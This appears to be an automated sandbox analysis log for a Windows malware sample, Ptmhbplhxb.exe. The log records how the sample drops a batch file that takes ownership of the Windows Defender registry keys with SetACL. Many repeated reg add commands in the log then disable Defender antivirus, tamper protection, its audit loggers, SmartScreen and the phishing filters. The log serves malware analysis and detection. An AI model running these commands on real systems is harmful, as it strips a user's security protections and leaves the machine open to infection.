Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exeCode function: 3_2_00F840D03_2_00F840D0
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exeCode function: 3_2_00F921613_2_00F92161
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exeCode function: 3_2_00F9C5083_2_00F9C508
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exeCode function: 3_2_00F946503_2_00F94650
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exeCode function: 3_2_00F88BB03_2_00F88BB0
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exeCode function: 3_2_00F5CCB03_2_00F5CCB0
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exeCode function: 3_2_00F72CB03_2_00F72CB0
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exeCode function: 3_2_00F84C303_2_00F84C30
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exeCode function: 3_2_00F78C003_2_00F78C00
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exeCode function: 3_2_00F80D603_2_00F80D60
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exeCode function: 3_2_00F64F403_2_00F64F40
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exeCode function: 3_2_00F992113_2_00F99211
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exeCode function: 3_2_00F517C03_2_00F517C0
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exeCode function: 3_2_00F6F7803_2_00F6F780
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exeCode function: 3_2_00FA38133_2_00FA3813
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exeCode function: 3_2_00FA39333_2_00FA3933
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exeCode function: 3_2_00F59A403_2_00F59A40
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exeCode function: 3_2_00F5DA103_2_00F5DA10
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exeCode function: 3_2_00F9DB793_2_00F9DB79
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exeCode function: 3_2_00FA1CAA3_2_00FA1CAA
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exeCode function: 3_2_00F5BDD03_2_00F5BDD0
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exeCode function: 3_2_00F7BE403_2_00F7BE40
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exeCode function: 3_2_00F63F903_2_00F63F90
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exeCode function: String function: 00F59A40 appears 97 times
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exeCode function: String function: 00F8BC40 appears 50 times
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exeCode function: String function: 00F58900 appears 82 times
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exeCode function: String function: 00F58340 appears 82 times
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exeCode function: String function: 00F61EE0 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exeCode function: String function: 00F58AD0 appears 66 times
Source: Ptmhbplhxb.exe, 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSentencing.exe4 vs Ptmhbplhxb.exe
Source: Ptmhbplhxb.exe, 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSetACL.exe. vs Ptmhbplhxb.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /f
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\PowerRun.exe C0ABBEEA8AE726503BC5643F3471E378D92FCB59A37043062BBF9BA64D95004C
Source: Ptmhbplhxb.exeReversingLabs: Detection: 55%
Source: C:\Users\user\Desktop\Ptmhbplhxb.exeFile read: C:\Users\user\Desktop\Ptmhbplhxb.exeJump to behavior
Source: Ptmhbplhxb.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Ptmhbplhxb.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\Ptmhbplhxb.exe C:\Users\user\Desktop\Ptmhbplhxb.exe
Source: C:\Users\user\Desktop\Ptmhbplhxb.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user~1\AppData\Local\Temp\nsq9535.tmp\do32.bat
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn setowner -ownr "n:Administrators"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t reg_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGears" /v "SpyNetReportingLocation" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_StoreAppsSmartScreenOff" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AccountProtection_MicrosoftAccount_Disconnected" /t REG_DWORD /d 1 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "PUAProtection" /t reg_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /f
Source: C:\Users\user\Desktop\Ptmhbplhxb.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user~1\AppData\Local\Temp\nsq9535.tmp\do32.batJump to behavior
Source: C:\Users\user\Desktop\Ptmhbplhxb.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn setowner -ownr "n:Administrators"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t reg_DWORD /d "0" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGears" /v "SpyNetReportingLocation" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AccountProtection_MicrosoftAccount_Disconnected" /t REG_DWORD /d 1 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "PUAProtection" /t reg_DWORD /d "0" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AccountProtection_MicrosoftAccount_Disconnected" /t REG_DWORD /d 1 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "PUAProtection" /t reg_DWORD /d "0" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t reg_DWORD /d "0" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
